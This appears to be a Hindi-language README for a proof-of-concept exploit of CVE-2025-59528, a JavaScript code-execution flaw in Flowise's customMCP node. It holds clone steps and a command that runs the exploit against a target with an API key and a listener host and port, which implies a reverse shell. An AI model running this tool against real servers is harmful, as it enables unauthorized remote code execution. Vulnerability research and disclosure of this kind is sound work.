
CVE-2025-59528 Proof of Concept
यह रिपॉजिटरी Flowise v3.0.5 में CVE-2025-59528 का प्रमाण-अवधारणा (proof of concept) प्रदर्शित करती है।
यह कमजोरी customMCP नोड में मौजूद है, जहाँ उपयोगकर्ता द्वारा प्रदान किया गया mcpServerConfig इनपुट इस प्रकार संसाधित किया जाता है जिससे Function कंस्ट्रक्टर के माध्यम से असुरक्षित मूल्यांकन द्वारा जावास्क्रिप्ट कोड निष्पादन होता है।
| प्रभावित | स्थिर |
|---|---|
| 3.0.5 | 3.0.6 |
एक प्रमाणित उपयोगकर्ता सर्वर पर मनमाना जावास्क्रिप्ट निष्पादित करने में सक्षम हो सकता है, जो संभावित रूप से दूरस्थ कोड निष्पादन की ओर ले जाता है।
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। निर्माता इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।